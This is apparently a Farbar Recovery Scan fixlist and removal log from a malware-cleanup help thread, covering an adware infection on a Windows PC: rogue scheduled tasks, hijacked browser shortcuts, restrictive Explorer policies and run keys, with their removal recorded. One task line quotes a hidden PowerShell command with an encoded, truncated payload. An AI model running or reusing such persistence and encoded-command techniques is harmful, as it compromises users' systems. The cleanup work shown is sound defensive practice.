2016-12-27 13:36 - 2016-12-27 13:36 - 00439808 _____ C:\ProgramData\smp2.exe
2016-12-27 13:36 - 2016-12-27 13:36 - 00187904 _____ C:\WINDOWS\rsrcs.dll
2016-12-27 13:36 - 2016-12-27 13:36 - 00004424 _____ C:\WINDOWS\System32\Tasks\SMW_UpdateTask_Time_3430393839393235392d5a556c6c4a5a575750414134
2016-12-27 13:36 - 2016-12-27 13:36 - 00004262 _____ C:\WINDOWS\System32\Tasks\SMW_P
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____H C:\WINDOWS\system32\BITBBD7.tmp
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____D C:\Users\Robert G\AppData\Roaming\JucdiJhnoz
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____D C:\Users\Robert G\AppData\LocalLow\Company
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____D C:\Users\Robert G\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____D C:\Users\Robert G\AppData\Local\Tempfolder
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____D C:\Users\Robert G\AppData\Local\CrashRpt
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____D C:\uninst
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____D C:\ProgramData\SearchModule
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____D C:\Program Files\JiddUn
2016-12-27 13:36 - 2016-12-27 13:36 - 00000000 ____D C:\Program Files\Common Files\Noobzo
2016-12-27 13:21 - 2016-12-27 13:21 - 00000000 ____D C:\ProgramData\d4b1e343-7d03-0
2016-12-27 13:16 - 2016-12-27 13:16 - 00003688 _____ C:\WINDOWS\System32\Tasks\System Healer Task
2016-12-27 13:16 - 2016-12-27 13:16 - 00002954 _____ C:\WINDOWS\System32\Tasks\System HealerPeriod
2016-12-27 13:16 - 2016-12-27 13:16 - 00002660 _____ C:\WINDOWS\System32\Tasks\System HealerStartUp
2016-12-27 13:16 - 2016-12-27 13:16 - 00001063 _____ C:\Users\Public\Desktop\Launch System Healer.lnk
2016-12-27 13:16 - 2016-12-27 13:16 - 00000308 _____ C:\WINDOWS\Tasks\System HealerStartUp.job
2016-12-27 13:16 - 2016-12-27 13:16 - 00000308 _____ C:\WINDOWS\Tasks\System HealerPeriod.job
2016-12-27 13:16 - 2016-12-27 13:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Healer
2016-12-27 13:16 - 2016-12-27 13:16 - 00000000 ____D C:\ProgramData\d4b1e343-2e47-1
2016-12-27 13:16 - 2016-12-27 13:16 - 00000000 ____D C:\Program Files (x86)\SystemHealer
2016-12-27 13:12 - 2016-12-27 13:12 - 08784866 _____ C:\xpack1221_US.1482324322.exe
2016-12-27 13:12 - 2016-12-27 13:12 - 00000000 ____D C:\Program Files (x86)\SoftUpgrade
2016-12-27 13:10 - 2016-12-27 13:11 - 08784866 _____ C:\WINDOWS\SysWOW64\SendRequest Error
2016-12-27 13:09 - 2016-12-27 13:54 - 00000000 ____D C:\WINDOWS\system32\SSL
2016-12-27 13:09 - 2016-12-27 13:09 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Socia2Sear Browser Enhancer
2016-12-27 13:09 - 2016-12-27 13:09 - 00000000 ____D C:\Program Files\66d2d577efd779c3e9f6f6c2faf74956
2016-12-27 13:08 - 2016-12-27 13:08 - 00001150 _____ C:\Users\Public\Desktop\KNCTR.lnk
2016-12-27 13:08 - 2016-12-27 13:08 - 00000000 ____D C:\Users\Robert G\AppData\Local\NowUSeeItPlayer
2016-12-27 13:08 - 2016-12-27 13:08 - 00000000 ____D C:\Users\Robert G\AppData\Local\Chromium
2016-12-27 13:08 - 2016-12-27 13:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NowUSeeIt Player
2016-12-27 13:08 - 2016-12-27 13:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KNCTR
2016-12-27 13:08 - 2016-12-27 13:08 - 00000000 ____D C:\Program Files (x86)\NowUSeeItPlayer
2016-12-27 13:08 - 2016-12-27 13:08 - 00000000 ____D C:\Program Files (x86)\Itibiti Soft Phone
2016-12-27 13:08 - 2016-12-27 13:08 - 00000000 ____D C:\Program Files (x86)\CleanBrowser
2016-12-27 13:07 - 2016-12-27 13:37 - 00000000 ____D C:\Users\Robert G\AppData\Local\E5AD75FC-1482844048-9D97-579A-C454442718AE
2016-12-27 13:07 - 2016-12-27 13:10 - 00100352 _____ C:\Users\Robert G\AppData\Local\slisdo.dll
2016-12-27 13:07 - 2016-12-27 13:10 - 00002560 _____ C:\Users\Robert G\AppData\Local\uninstallro.exe
2016-12-27 13:07 - 2016-12-27 13:07 - 00003074 _____ C:\WINDOWS\System32\Tasks\Update Service for Youtube AdBlock2
2016-12-27 13:07 - 2016-12-27 13:07 - 00000366 _____ C:\WINDOWS\Tasks\Update Service for Youtube AdBlock2.job
2016-12-27 13:07 - 2016-12-27 13:07 - 00000000 ____H C:\WINDOWS\system32\BITDFC5.tmp
2016-12-27 13:07 - 2016-12-27 13:07 - 00000000 ____D C:\Users\Robert G\AppData\Roaming\ProxyGate
2016-12-27 13:07 - 2016-12-27 13:07 - 00000000 ____D C:\Users\Robert G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AnonymizerGadget
2016-12-27 13:07 - 2016-12-27 13:07 - 00000000 ____D C:\Program Files\1OZOH9DOKF
2016-12-27 13:07 - 2016-12-27 13:07 - 00000000 ____D C:\Program Files\0DA5GV0SMZ
2016-12-27 13:06 - 2016-12-27 13:08 - 00000000 ____D C:\Program Files (x86)\BestCleaner
2016-12-27 13:06 - 2016-12-27 13:06 - 00002770 _____ C:\WINDOWS\System32\Tasks\Update Service for Youtube AdBlock
2016-12-27 13:06 - 2016-12-27 13:06 - 00000366 _____ C:\WINDOWS\Tasks\Update Service for Youtube AdBlock.job
2016-12-27 13:06 - 2016-12-27 13:06 - 00000258 __RSH C:\ProgramData\ntuser.pol
2016-12-27 13:06 - 2016-12-27 13:06 - 00000000 ____D C:\Program Files (x86)\Youtube AdBlock
2016-12-27 13:05 - 2016-12-27 13:06 - 02194294 _____ (Stellar Information Technology Pvt Ltd. ) C:\Users\Robert G\Downloads\Unconfirmed 89628.crdownload
2016-12-27 13:05 - 2016-12-27 13:06 - 00003874 _____ C:\WINDOWS\System32\Tasks\73699857
2016-12-27 13:05 - 2016-12-27 13:06 - 00003866 _____ C:\WINDOWS\System32\Tasks\k73699857
2016-12-27 13:05 - 2016-12-27 13:06 - 00003860 _____ C:\WINDOWS\System32\Tasks\18170115
2016-12-27 13:05 - 2016-12-27 13:06 - 00003856 _____ C:\WINDOWS\System32\Tasks\60353394
2016-12-27 13:05 - 2016-12-27 13:06 - 00003746 _____ C:\WINDOWS\System32\Tasks\ga7369985773699857
2016-12-27 13:05 - 2016-12-27 13:06 - 00003742 _____ C:\WINDOWS\System32\Tasks\gak73699857k73699857
2016-12-27 13:05 - 2016-12-27 13:06 - 00003734 _____ C:\WINDOWS\System32\Tasks\ga1817011518170115
2016-12-27 13:05 - 2016-12-27 13:06 - 00003728 _____ C:\WINDOWS\System32\Tasks\ga6035339460353394
2016-12-27 13:05 - 2016-12-27 13:05 - 00000000 ___HD C:\Program Files (x86)\Ovals
2016-12-27 13:05 - 2016-12-27 13:05 - 00000000 ___HD C:\Program Files (x86)\mem
2016-12-27 13:05 - 2016-12-27 13:05 - 00000000 ___HD C:\Program Files (x86)\Disenfranchise
2016-12-27 13:05 - 2016-12-27 13:05 - 00000000 ____D C:\Users\Robert G\AppData\Roaming\ASPackage
2016-12-27 13:05 - 2016-12-27 13:05 - 00000000 ____D C:\Program Files\AE5AV44CD6
2016-12-27 13:05 - 2016-12-27 13:05 - 00000000 ____D C:\Program Files (x86)\knockdowns
2016-12-27 13:05 - 2016-12-27 13:05 - 00000000 ____D C:\Program Files (x86)\E5AD75FC-1482865504-9D97-579A-C454442718AE
2016-12-27 13:03 - 2016-12-27 13:07 - 00000000 ____D C:\Users\Robert G\AppData\Roaming\AGData
2016-12-27 13:03 - 2016-12-27 13:03 - 00003804 _____ C:\WINDOWS\System32\Tasks\src_srv
2016-12-27 13:03 - 2016-12-27 13:03 - 00003414 _____ C:\WINDOWS\System32\Tasks\AGProxyCheck
2016-12-27 13:03 - 2016-12-27 13:03 - 00000000 ____D C:\Users\Robert G\AppData\Roaming\src_srv
2016-12-27 13:03 - 2016-12-27 13:03 - 00000000 ____D C:\Program Files (x86)\AnonymizerGadget
2016-12-27 13:02 - 2016-12-27 13:08 - 00000000 ____D C:\Program Files (x86)\Unfugitivepocson
2016-12-27 13:02 - 2016-12-27 13:02 - 00024776 _____ C:\WINDOWS\System32\Tasks\{7D0C7D47-7A0E-7E79-0A11-087E790A110B}
2016-12-27 13:02 - 2016-12-27 13:02 - 00003692 _____ C:\WINDOWS\System32\Tasks\One System Care Task
2016-12-27 13:02 - 2016-12-27 13:02 - 00003372 _____ C:\WINDOWS\System32\Tasks\One System Care Monitor
2016-12-27 13:02 - 2016-12-27 13:02 - 00001147 _____ C:\Users\Public\Desktop\Launch One System Care.lnk
2016-12-27 13:02 - 2016-12-27 13:02 - 00000000 ____D C:\Users\Robert G\AppData\Roaming\One System Care
2016-12-27 13:02 - 2016-12-27 13:02 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care
2016-12-27 13:02 - 2016-12-27 13:02 - 00000000 ____D C:\ProgramData\1a467d37-72a5-1
2016-12-27 13:02 - 2016-12-27 13:02 - 00000000 ____D C:\ProgramData\1a467d37-42f7-0
2016-12-27 13:02 - 2016-12-27 13:02 - 00000000 ____D C:\Program Files (x86)\OneSystemCare
2016-12-27 12:51 - 2016-12-27 12:51 - 00010752 _____ C:\Users\Robert G\AppData\Local\fluctuations.exe
2016-12-21 06:43 - 2016-12-21 06:43 - 00046592 _____ C:\exervice.exe
2016-12-16 09:24 - 2016-12-16 09:24 - 01718968 _____ C:\WINDOWS\4b15ad0c9aba0f5f34b9d34c5ca543e0.exe
2016-12-16 09:18 - 2016-12-16 09:18 - 00095040 _____ (97V68D) C:\WINDOWS\system32\Drivers\979804fd5c15500d838ae68596384f64.sys
2014-12-01 12:43 - 2014-12-01 12:43 - 0000230 _____ () C:\Users\Robert G\AppData\Local\328ac946-536c-4e44-8483-c0f65d99bbad.dat
2014-12-01 12:43 - 2014-12-01 12:43 - 0000854 _____ () C:\Users\Robert G\AppData\Local\7396d5af-93b3-4d36-bfec-04bbd1449761.dat
2014-12-01 12:43 - 2014-12-01 12:43 - 0000230 _____ () C:\Users\Robert G\AppData\Local\9483d08e-1f72-4d13-b956-5e490aa0f581.dat
2014-12-01 12:43 - 2014-12-01 12:43 - 0000278 _____ () C:\Users\Robert G\AppData\Local\b62f5060-8250-438a-a930-35c70e952a02.dat
2016-12-27 12:51 - 2016-12-27 12:51 - 0010752 _____ () C:\Users\Robert G\AppData\Local\fluctuations.exe
2016-12-27 13:07 - 2016-12-27 13:10 - 0100352 _____ () C:\Users\Robert G\AppData\Local\slisdo.dll
2016-12-27 13:07 - 2016-12-27 13:10 - 0002560 _____ () C:\Users\Robert G\AppData\Local\uninstallro.exe
2016-12-27 13:36 - 2016-12-27 13:36 - 0439808 _____ () C:\ProgramData\smp2.exe
C:\Users\Robert G\AppData\Local\Temp\12C5.tmp.exe
C:\Users\Robert G\AppData\Local\Temp\9S1ETRV3OH.exe
C:\Users\Robert G\AppData\Local\Temp\B4E9.tmp.exe
C:\Users\Robert G\AppData\Local\Temp\ICReinstall_B4E9.tmp.exe
C:\Users\Robert G\AppData\Local\Temp\sdf6733.exe
C:\Users\Robert G\AppData\Local\Temp\W66KQ7BR7K.exe
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Citrix\GoToMeeting\1468\G2MOutlookAddin64.dll => No File
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-3079306625-983104223-3348847558-1001_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\Robert G\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => No File
Task: {0A6D162B-2271-438A-9015-FDF86E38E3A1} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> No File <==== ATTENTION
Task: {0B0C6F63-0BD1-498A-9527-397F7F32D262} - System32\Tasks\gak73699857k73699857 => C:\Program Files (x86)\knockdowns\knockdowns.exe [2016-12-27] (activate)
Task: {11643EA6-43A5-4B26-BCA2-B79C17E2627D} - System32\Tasks\System HealerStartUp => C:\Program Files (x86)\SystemHealer\SystemHealer.exe [2016-12-26] () <==== ATTENTION
Task: {136AC49D-1185-4DAF-9EED-4010A2D37876} - System32\Tasks\src_srv => C:\Users\Robert G\AppData\Roaming\src_srv\tsktst.exe [2016-12-26] ()
C:\Program Files (x86)\knockdowns
Task: {1990B26F-6ADF-4BD8-BA6F-799C43204F26} - System32\Tasks\18170115 => C:\Users\Robert G\AppData\Local\fluctuations.exe [2016-12-27] () <==== ATTENTION
Task: {1CCBFDDC-4FED-4859-9EA1-176E35894E0A} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {1E7810AB-4461-4BAB-A923-725FF0121E8B} - System32\Tasks\73699857 => C:\Program Files (x86)\Disenfranchise\fluctuations.exe [2016-12-27] () <==== ATTENTION
Task: {20A9A40C-98B8-4A9E-9EF4-34A0EB5D2C67} - System32\Tasks\Update Service for Youtube AdBlock => C:\Program Files (x86)\Youtube AdBlock\izxn57D.exe [2016-12-27] () <==== ATTENTION
Task: {335F0AFA-8CF9-409A-931C-B15A49778819} - System32\Tasks\Update Service for Youtube AdBlock2 => C:\Program Files (x86)\Youtube AdBlock\izxn57D.exe [2016-12-27] () <==== ATTENTION
Task: {4E463819-FB04-48C1-ACDA-F4F4D23C5466} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {52AE6531-40FD-4377-BFBD-D5FBC7CEFD1A} - System32\Tasks\SMW_UpdateTask_Time_3430393839393235392d5a556c6c4a5a575750414134 => Wscript.exe //B "C:\ProgramData\SearchModule\smhe.js" smu.exe /invoke /f:check_services /l:0 <==== ATTENTION
Task: {5C8969CF-AF98-4F0F-A7DD-B1B9C5CC10B2} - System32\Tasks\System Healer Task => C:\Program Files (x86)\SystemHealer\RescueMonitor.exe [2016-12-26] () <==== ATTENTION
Task: {5D326864-1C1B-4B0C-98E4-8975183EBD11} - \WPD\SqmUpload_S-1-5-21-3079306625-983104223-3348847558-1001 -> No File <==== ATTENTION
Task: {69CE572E-9923-4159-A330-DB1D3C2631A8} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {6EFA82CE-E47B-4B0A-AD1A-88DC8A5D6565} - System32\Tasks\60353394 => C:\Program Files (x86)\Ovals\fluctuations.exe [2016-12-27] () <==== ATTENTION
Task: {7115A4DA-439D-4050-9AEF-FD2E2E5A752E} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {7B8662A0-9355-4D8A-8BFD-BEAF35343CD1} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {7C02E7AF-D6DC-44AC-B6B1-3B4DDDE34DAF} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {85384654-A986-4FB7-A8DA-D7761EDA3149} - System32\Tasks\k73699857 => C:\Program Files (x86)\knockdowns\knockdowns.exe [2016-12-27] (activate)
Task: {965C4FE9-DA8F-4232-8D6F-D709676DEF24} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {99C8DB32-949A-499C-B5D9-6042D048950D} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {9FFCB734-D79F-4764-8B63-4F06330E3F45} - System32\Tasks\One System Care Monitor => C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe [2016-12-26] () <==== ATTENTION
Task: {A06CEAA3-C663-4DD1-BE93-23D8A41E521F} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {A18C8BED-9923-4C65-B78D-B7C168B06955} - System32\Tasks\ga1817011518170115 => C:\Users\Robert G\AppData\Local\fluctuations.exe [2016-12-27] ()
Task: {A9528279-474A-4DBA-B459-B825FF0C055E} - System32\Tasks\System HealerPeriod => C:\Program Files (x86)\SystemHealer\SystemHealer.exe [2016-12-26] () <==== ATTENTION
Task: {AA44AE25-68B3-45C6-B7D1-06333F50237C} - System32\Tasks\SMW_P => C:\ProgramData\smp2.exe [2016-12-27] () <==== ATTENTION
Task: {AB85B611-7F3D-4A11-A7EA-5DAC9B9FCCEC} - System32\Tasks\AGProxyCheck => C:\Program [Argument = Files (x86)\AnonymizerGadget\AGService.exe /recove]
Task: {ADD99CD3-D8CD-40A8-935C-68C869A6BCB2} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {B4B655B9-3E3B-42D6-8EF3-721B1CAC4B75} - System32\Tasks\ga7369985773699857 => C:\Program Files (x86)\Disenfranchise\fluctuations.exe [2016-12-27] ()
Task: {B7270AB1-E0AB-41E2-971C-27831D9730D2} - System32\Tasks\One System Care Task => C:\Program Files (x86)\OneSystemCare\SystemConsole.exe [2016-12-26] () <==== ATTENTION
Task: {C3BB1E32-5428-4562-8D07-A171B852CB9C} - System32\Tasks\{7D0C7D47-7A0E-7E79-0A11-087E790A110B} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAA7ACAAOwA7ADsAIAAgACAAOwAgADsAIAA7ADsAIAA7ACAAOwAgADsAIAAgACAAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcA (the data entry has 10148 more characters). <==== ATTENTION
Task: {FD468177-984E-4514-B2CE-7B86E83EF36F} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: C:\WINDOWS\Tasks\System HealerPeriod.job => <==== ATTENTION
Task: C:\WINDOWS\Tasks\System HealerStartUp.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Update Service for Youtube AdBlock.job => C:\Program Files (x86)\Youtube AdBlock\izxn57D.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\Update Service for Youtube AdBlock2.job => C:\Program Files (x86)\Youtube AdBlock\izxn57D.exe <==== ATTENTION
ShortcutWithArgument: C:\Users\Robert G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,
ShortcutWithArgument: C:\Users\Robert G\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,
ShortcutWithArgument: C:\Users\Robert G\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> "microsoft-edge:hxxp://www%2dsearching.com/?prd=set_epe&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,"
ShortcutWithArgument: C:\Users\Robert G\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Search.lnk -> C:\program files (x86)\Google\Chrome\application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epe&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epc&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epc&s=GCRzftptn095001AU,3e47179f-493e-4e61-bbf2-f3874f484c85,
C:\WINDOWS\TEMP\Jxwh7jTdDh8tytSaP
AlternateDataStreams: C:\ProgramData\Temp:972E3A44 [272]
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Classes\exefile: "%1" %* <===== ATTENTION
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Classes\.exe: exefile => "%1" %* <===== ATTENTION
FirewallRules: [{0CFEF3A1-D62E-4242-BA17-47AFEC0E9CFE}] => C:\Program Files (x86)\Ovals\fluctuations.exe
FirewallRules: [{CE917A65-979C-4094-9A27-546C03A0F0B4}] => C:\Program Files (x86)\Disenfranchise\fluctuations.exe
FirewallRules: [{70CB83FD-6AD0-4679-BD8F-A7D29BD02E90}]
FirewallRules: [{4ABBB1A8-3F3A-42F2-AFD1-8A812FD3A3E2}]
hosts:
emptytemp:
*****************
 
Restore point was successfully created.
Processes closed successfully.
C:\Users\Robert G\AppData\Local\Temp\WS => moved successfully
C:\Users\Robert G\AppData\Roaming\src_srv => moved successfully
C:\Program Files\AE5AV44CD6 => moved successfully
C:\Program Files (x86)\E5AD75FC-1482865504-9D97-579A-C454442718AE => moved successfully
C:\Program Files (x86)\mem => moved successfully
C:\Program Files (x86)\BestCleaner => moved successfully
C:\Program Files\1OZOH9DOKF => moved successfully
C:\Program Files\0DA5GV0SMZ => moved successfully
"C:\Program Files (x86)\Unfugitivepocson" => not found.
C:\Program Files (x86)\Ovals => moved successfully
"C:\Program Files (x86)\NowUSeeItPlayer" => not found.
"C:\Program Files\66d2d577efd779c3e9f6f6c2faf74956\e06d61be9f5e5cd7184b5ecb5bf64007.exe" => not found.
C:\Program Files\Common Files\Noobzo => moved successfully
"C:\Program Files\Jidd" => not found.
C:\Users\Robert G\AppData\Roaming\JucdiJhnoz => moved successfully
C:\Users\Robert G\AppData\Roaming\Xeeedxi => moved successfully
C:\Users\Robert G\AppData\Roaming\Interstatnogui => moved successfully
"C:\Windows\Temp\nst9E9E.tmp" => not found.
C:\Windows\Temp\set_xVQSGNGL.exe => moved successfully
"C:\Windows\Temp\set_xVQSGNGL.exe" => not found.
"C:\Users\Robert G\AppData\Local\Temp\WS" => not found.
"C:\Program Files (x86)\Unfugitivepocson" => not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\group => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\groupgroup => value removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\AnonymizerGadget => value not found.
C:\Users\Robert G\AppData\Roaming\AGData => moved successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\src_srv => value removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ayling => value removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\aylingayling => value removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\BestCleaner => value not found.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\NowUSeeIt Player => value not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\\OMEWPRODUCT_FD7I7 => value not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\\OMEWPRODUCT_4SCPB => value not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoViewOnDrive => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\DisableLocalMachineRun => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\DisableLocalMachineRunOnce => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\DisableCurrentUserRun => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\DisableCurrentUserRunOnce => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoViewContextMenu => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoShellSearchButton => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoFind => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoFile => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\HideClock => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoTrayContextMenu => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoTrayItemsDisplay => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoSetFolders => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoDevMgrUpdate => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoSetTaskbar => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoDeletePrinter => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoDFSTab => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoChangeStartMenu => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoLogoff => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoWindowsUpdate => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoEncryptOnMove => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoRunasInstallPrompt => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoResolveSearch => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoSaveSettings => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoHardwareTab => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoStartMenuSubFolders => value removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoDesktop => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Run\\probabaly => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Run\\probabalyprobabaly => value removed successfully
HKU\S-1-5-21-3079306625-983104223-3348847558-1001\Software\Microsoft\Windows\CurrentVersion\Run\\formally => value removed successfully
